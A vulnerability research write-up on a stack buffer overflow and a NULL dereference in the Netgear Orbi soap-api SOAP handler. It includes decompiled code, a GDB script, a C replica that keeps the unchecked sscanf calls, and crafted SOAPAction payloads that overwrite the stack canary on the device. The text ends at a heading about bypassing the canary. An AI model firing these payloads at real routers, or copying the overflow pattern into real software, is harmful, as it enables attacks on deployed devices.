orbi hunting 0x1: crashes in soap-api

introduction
first find: buffer overflow in SendSoapResponse()
deep dive: SendSoapResponse()
(failed) exploit attempt #1
exploit viability, revisited
stack canary bypass, question mark?
conclusion
references

introduction

The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http://<ROUTER>/soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router, but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every request I sent to this endpoint caused a stack trace to be printed to the console. This seemed like a good enough place to start, so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.

Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.

background

The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it on to soap-api. The server sets environment variables that describe the request, which soap-api then reads in order to handle it.

The format of the SOAPAction header is:

urn:VENDOR:service:ACTION_str:1#METHOD_str
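To make the layout concrete, here is a minimal sketch of how a value of this shape could be split into its action and method parts. This is not the code from soap-api: split_soap_action() and its error handling are hypothetical and only illustrate the format described above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not taken from soap-api): split a SOAPAction value of
 * the form "urn:VENDOR:service:ACTION:1#METHOD" into ACTION and METHOD.
 * Returns 0 on success, -1 if the value does not match or a part does not fit. */
int split_soap_action(const char *hdr, char *action, size_t action_sz,
                      char *method, size_t method_sz)
{
    static const char marker[] = "service:";
    const char *svc, *colon, *hash;
    size_t alen, mlen;

    assert(action_sz > 0 && method_sz > 0);
    if (hdr == NULL || action == NULL || method == NULL)
        return -1;

    svc = strstr(hdr, marker);
    if (svc == NULL)
        return -1;
    svc += sizeof(marker) - 1;          /* first byte of ACTION */

    colon = strchr(svc, ':');           /* ACTION ends at the next ':' */
    hash = strchr(svc, '#');            /* METHOD starts after '#' */
    if (colon == NULL || hash == NULL || colon > hash)
        return -1;

    alen = (size_t)(colon - svc);
    mlen = strlen(hash + 1);
    if (alen >= action_sz || mlen >= method_sz)
        return -1;                      /* refuse instead of truncating or overflowing */

    memcpy(action, svc, alen);
    action[alen] = '\0';
    memcpy(method, hash + 1, mlen + 1); /* copy includes the terminating NUL */
    return 0;
}
```

Called with "urn:VENDOR:service:ACTION:1#METHOD", this fills the two output buffers with "ACTION" and "METHOD". Everything after the '#' is treated as the method, which is the part the rest of this post abuses.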

crash discovery

While doing some manual testing, starting from a known-good SOAPAction header value, I found that the server would send the following response when given a METHOD_str part that is 248 characters or longer, while simultaneously causing a crash dump to be printed to the console.

HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"></m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : [<b6b52db4>]    lr : [<b6b4ee88>]    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[<c021ea68>] (unwind_backtrace) from [<c021bb60>] (show_stack+0x10/0x14)
[<c021bb60>] (show_stack) from [<c03b5518>] (dump_stack+0x78/0x98)
[<c03b5518>] (dump_stack) from [<c02234b0>] (__do_user_fault+0x74/0xbc)
[<c02234b0>] (__do_user_fault) from [<c022385c>] (do_page_fault+0x2f0/0x370)
[<c022385c>] (do_page_fault) from [<c02083dc>] (do_DataAbort+0x34/0x98)
[<c02083dc>] (do_DataAbort) from [<c02096f4>] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff

Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone, as the stack trace only shows the top of the call stack: the chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra, find where the SOAPAction header was being parsed, and trace it through the application, looking for places where it could overflow a buffer.

first find: buffer overflow in SendSoapResponse()

After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output I was getting from the server, I found the following piece of code at function 0x0003e82c. From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.

[screenshot: Ghidra decompiler output for the function at 0x0003e82c]

The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf(). This line parses the SOAP method section from the server response content (<m:AAAAA[...]Response) and writes it to the buffer auStack236, a fixed-size 64-byte stack buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.

After reading through the code some more I realized almost every request eventually led to SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:

main()
- takes care of getting the SOAPAction header from an environment variable SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
- handles parsing of the SOAP action and SOAP method parts from the header
- saves pointers to the start of each section in the buffer/PTR returned by getenv()
- these ptrs are passed to SoapExecute()
SoapExecute()
- The main function that actually does handling of the various SOAP actions and methods
- Handles authentication checks
- Calls appropriate functions/etc based on submitted actions / method
- at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
SendSoapRespCode()
- Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
- The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
SendSoapResponse()
- Here the final response content is finalized and sent to the client

live debugging

At this point I felt pretty confident I was crashing soap-api from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api, I would have to debug on bare metal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.

For each request that accesses SOAP functionality, lighttpd forks and (something) eventually executes soap-api to handle this request. I initially had some trouble getting the debugger to catch when soap-api was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.

These were:

create break on main()
set follow-fork-mode child
continue
after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
set follow-fork-mode parent (to prevent new forks from taking over)
continue

This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces, and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up, insert a breakpoint on sscanf(), and catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and 10 words starting at the current stack pointer, and do much the same on segfault.

set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue

lolwut: a null dereference

With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:

[screenshot: GDB output at the crash]

This output seemed to indicate that:

The crash was happening in strcmp in libc.so.1
The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0, which is 0 at the time of the crash

deep dive: SendSoapResponse()

At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the crash. I tried different payload lengths and values to see if they caused anything other than a null pointer dereference but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.

how the payload reaches SendSoapResponse()

The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:

  char resp[512];
  char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
  snprintf(resp, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);

Assuming a method “METHOD”, action “ACTION”, and response code 404, the resulting string would be:

<m:METHODResponse xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1"></m:METHODResponse>
<ResponseCode>404</ResponseCode>

snprintf() will write at most 512 bytes (including the terminating NUL), and that limit can be reached within the first %s argument if it’s long enough, in which case nothing after it is formatted and the rest of the string is truncated. For example, submitting a method string containing 500 A’s results in the following string:

<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse
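The truncation is easy to reproduce off-device. The sketch below reuses the format string from the snippet above; build_resp() and RESP_SIZE are names made up for this illustration, not symbols from the binary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define RESP_SIZE 512   /* size of resp according to the snippet above */

/* Illustrative helper: build the response body with the same format string and
 * report whether the "service:" marker survived truncation.
 * Returns 1 if "service:" is still present in out, 0 if it was cut off. */
int build_resp(char out[RESP_SIZE], const char *method, const char *action, int code)
{
    assert(out != NULL && method != NULL && action != NULL);
    snprintf(out, RESP_SIZE,
             "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n"
             "<ResponseCode>%03d</ResponseCode>\r\n",
             method, action, method, code);
    return strstr(out, "service:") != NULL;
}
```

With a 500-character method the output is exactly 511 characters long ("<m:" plus 500 A's plus "Response"), so the function returns 0: everything from " xmlns:m=" onward, including "service:", never makes it into the buffer.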

code breakdown

The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post, but with the annotations and renamed variables I added after going through it all and labeling everything.

Ghidra decompiler output:

/*1*/      if (is_soap_login == 1) {
/*2*/        local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/       fprintf(stream,
/*4*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/                ,total_content_len,local_jwt_ptr);
/*6*/      }
/*7*/      else {
/*8*/        fprintf(stream,
/*9*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/                ,total_content_len);
/*11*/      }
/*12*/      soap_log(2,
/*13*/               "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nServer: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/               ,total_content_len);
/*15*/      fputs(s_<?xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/      fputs(resp,stream);
/*17*/      fputs(s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc,stream);
/*18*/      soap_log(0,"%s%s%s",s_<?xml_version="1.0"_encoding="UT_000bd624,resp,
/*19*/               s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc);
/*20*/      fflush(stream);

/*21*/      if ((ext_mode == 0) &&
/*22*/         (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/                        /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/                            */
/*25*/        sscanf(resp,"<m:%sResponse%*s",method_response_buf);
/*26*/        strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/        if (strstr_Response_ret != (char *)0x0) {
/*28*/          *strstr_Response_ret = '\0';
/*29*/        }
/*30*/                        /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/        sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"<ResponseCode>");
/*34*/        if (ptr_to_substrings_found != (char *)0x0) {
/*35*/          sscanf(ptr_to_substrings_found,"<ResponseCode>%[^<]",&local_114);
/*36*/        }
/*37*/        vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/        execve_wrapper_maybe
/*39*/                  ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/                   combined_action_method_str,&local_114,0);
/*41*/        FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/      }

Arguments:
- FILE *stream: filestream where response will be written (socket back to client?)
- char *resp: a 512-byte buffer containing the body of the XML SOAP response constructed by the calling function (SendSoapRespCode)
Lines 1-20 in the snippet handle constructing and sending the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
- note: this is why the response is always sent, even when the process goes on to crash
Line 25: a call to sscanf to attempt to parse the SOAP method string
- other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
- the format string targets the pattern <m:*Response*, but %s only stops at whitespace, so sscanf copies everything after the colon up to and including ‘Response’
- method_response_buf is a fixed-size 64-byte stack buffer
- it’s possible to overflow this buffer if the string between <m: and the end of Response does not fit in 64 bytes, which appears to be possible to do
Line 26: a call to a strstr wrapper to check for the presence of the string “Response” in the data that was read into method_response_buf by sscanf
- this wrapper first checks to make sure neither of the two arguments passed to it are NULL
  - if either of them is, it doesn’t call strstr and just returns a NULL pointer
  - if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
- If the submitted SOAP method has pushed the Response string entirely off the end of the XML buffer that is constructed, this would return NULL
Lines 27-29: if the call to strstr did NOT return NULL (the Response string was found), overwrite the first char of Response with a NUL byte
- This NUL-terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NUL and the Response part is truncated
Line 31: another call to strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string "service:"
- there is no check after this to see if this returned NULL
Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:", this time using the value returned by the call to strstr on the previous line as its source
- since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
- this only happens when the method string was sufficiently long to have pushed the "service:*:" string off the end of the XML body buffer resp
Line 33: third call to strstr wrapper, this time searching for the string "<ResponseCode>" in resp
Lines 34-36: if the string was found by the call to strstr on the previous line, sscanf is used to parse out a substring similar to previous calls; otherwise this is just skipped.
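The wrapper behavior described for line 26, and the check that is missing after line 31, can be sketched as follows. This is a reconstruction from the description above rather than the decompiled code: the real wrapper's signature is unknown, parse_action_checked() is hypothetical, and the 32-byte destination size is an assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sketch of the wrapper as described above: refuse NULL inputs, otherwise
 * defer to strstr(). Either way the caller can get NULL back. */
char *strstr_wrapper(const char *haystack, const char *needle)
{
    if (haystack == NULL || needle == NULL)
        return NULL;
    return strstr(haystack, needle);
}

/* Hypothetical version of lines 31-32 with the missing NULL check added.
 * Returns 1 if an action was parsed, 0 otherwise. The %31[^:] width assumes a
 * 32-byte destination buffer (an assumption, not a value from the binary). */
int parse_action_checked(const char *resp, char action[32])
{
    const char *p;

    assert(action != NULL);
    p = strstr_wrapper(resp, "service:");
    if (p == NULL)
        return 0;   /* the original passes this NULL straight to sscanf() */
    return sscanf(p, "service:%31[^:]", action) == 1;
}
```

The point of the sketch is the early return: without it, a response that no longer contains "service:" hands a NULL source pointer to sscanf(), which matches the crash seen in the debugger.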

takeaways

After going through the code, I knew the following:

It is possible to overflow method_response_buf that the first call to sscanf() writes the method string to.
It is possible to overflow service_action_buf that the second call to sscanf() writes the action string to.
A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
- This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp

Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:' string to be truncated from the end of resp, causing the strstr() call which checks for it to return a null pointer that is then passed to sscanf() without checking if it was null first.
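One detail from the first takeaway is worth seeing in isolation: what the format string on line 25 actually captures. The sketch below uses the same format with a field width added so the demo itself cannot overflow; parse_method_token() and the 256-byte destination are choices made for this illustration only.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse the method token with the same format as line 25, plus a field width.
 * dst must hold at least 256 bytes. Returns the length of the captured token,
 * or -1 if nothing was parsed. */
int parse_method_token(const char *resp, char dst[256])
{
    assert(resp != NULL && dst != NULL);
    /* %s stops only at whitespace, so the literal "Response" that follows it
     * in the format never gets to match: it has already been copied into dst. */
    if (sscanf(resp, "<m:%255sResponse%*s", dst) != 1)
        return -1;
    return (int)strlen(dst);
}
```

For a body starting with "<m:METHODResponse xmlns:m=..." the captured token is "METHODResponse", which is why the original code has to search for "Response" afterwards and cut it off. It also means the unbounded version writes the method, plus the 8 bytes of "Response", plus a NUL, so a 248-character method puts 257 bytes into the 64-byte buffer.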

(failed) exploit attempt #1

The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:

the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
the final contents of resp must include the string 'service:'

With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null dereference but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for the service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and was pretty exhausted, so I just called it and concluded that even though the buffer overflow was there, it was ‘unreachable’ due to the (incorrect) constraints I had in mind at the time. Honestly, I was just relieved to be done with it.

exploit viability, revisited

As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, which I was basically going to end with the section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had left me with an inaccurate understanding of the constraints and of the behavior of sscanf(). I’ve corrected those mistakes in the code breakdown above in the interest of clarity. Anyway, I updated my mental model of the bug.

With a new understanding of the constraints, I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL dereference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.

From the GPL archive (soap-api is part of the net-cgi package):

./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector

local testing

In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int replica (FILE *stream, char *resp) {
	// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
	int content_len;
	char* jwt;
	char *var2;
	char *var3;
	char *var4;
	char method_buf[64];
	char action_buf[32];
	char combined_action_method[128];
	char *undef1;
	char *undef2;
	int stack_check_val;

	printf("resp: %s\n", resp);

	// fake stack canary
	stack_check_val = 0x313373;
	printf("[+] stack check start: 0x%x\n", stack_check_val);

	// null the buffers
	memset(method_buf, 0, 64);
	memset(action_buf, 0, 32);
	memset(combined_action_method, 0, 128);

	// call sscanf - 1: parse the Method portion from the xml blob in resp
	// and save it to method buf (format is '<m:METHODResponse*'). there is a buffer overflow
	// here if the parsed string is greater than 64 bytes
	printf("[+] sscanf call 1: parse method portion from resp\n");
	sscanf(resp, "<m:%sResponse%*s", method_buf);

	// this would check to confirm that the expected pattern/str was parsed (should still
	// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
	// fail this check.
	var2 = strstr(method_buf, "Response");
	// but it doesn't really matter because it's only to see if
	if (var2 != (char *)0x0) {
		printf("[+] found 'Response' in method_buf, NULLED\n");
		*var2 = 0x0;
	}

	// ========= Second call to sscanf() and NULL check fail ===========
	// search for service string in resp, no NULL check
	// a long enough METHOD would result in this being truncated, causing strstr
	// to return a NULL pointer
	printf("[+] strstr call 1: check for 'service:' in resp\n");
	var3 = (char *)strstr(resp, "service:");
	// DEBUG -- show when we fail this check
	if (var3 == (char *)0x0) {
		printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
		printf("resp: %s\n", resp);
	}
	printf("[+] sscanf call 2: parse ACTION portion from resp\n");
	sscanf(var3, "service:%[^:]", action_buf);

	// check for <ResponseCode> in resp
	printf("[+] strstr call 2: check for '<ResponseCode>' in resp\n");
	var3 = (char *)strstr(resp, "<ResponseCode>");
	if (var3 != (char *)0x0) {
		// if its there, parse some stuff from it (not important right now)
		printf("[+] found <ResponseCode>, passed check\n");
		undef1 = 0;
	}

	// check if the stack check int was overwritten
	printf("[+] stack check end: 0x%x\n", stack_check_val);
	return 0;
}

int main(int argc, char *argv[]) {
	// args to pass to target func (replicating original)
	FILE *streams = 0;

	// this will hold the payload (i.e. the Method portion we would submit)
	// read from env to make testing easier
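	char *payload = getenv("PAYLOAD");
	if (payload == NULL) {
		fprintf(stderr, "[!] set the PAYLOAD environment variable first\n");
		return 1;
	}
	printf("[+] payload length: %zu\n", strlen(payload));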

	// construct the response content the same way the server does in SendSoapRespCode()
	char resp_b[512];
	memset(resp_b, 0, 512);
	// this is the fmt string the calling function uses to construct resp
	char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
	snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);

	// call the target function with the payload
	printf("[+] calling target function...\n\n");
	replica(streams, resp_b);
	return 0;
}

I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with a payload that one would assume would definitely pass the string check:

-> % ./replica2
[+] payload length: 130
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m="urn:NETGEAR-ROUTER:service:ConfigSync:1"></m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response>
<ResponseCode>404</ResponseCode>

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1]    221258 segmentation fault (core dumped)  ./replica2

After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:

-> % ./replica2
[+] payload length: 2450
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '<ResponseCode>' in resp
[+] stack check end: 0x63697672
[1]    221814 segmentation fault (core dumped)  ./replica2

Nice!

now, against the device

With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"

I modified the GDB script I had been using to break on __stack_chk_fail() instead of sscanf() to confirm and saw this in the output:

[screenshot: GDB output at the __stack_chk_fail() breakpoint]

Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.

I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"

Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 <__stack_chk_fail>
cpsr           0x80000010	-2147483632
0x0:	<error: Cannot access memory at address 0x0>
0xb6f01b65:	""
0x42424242:	<error: Cannot access memory at address **0x42424242**>
0x5719b01e:	<error: Cannot access memory at address 0x5719b01e>

stack canary bypass, question mark?

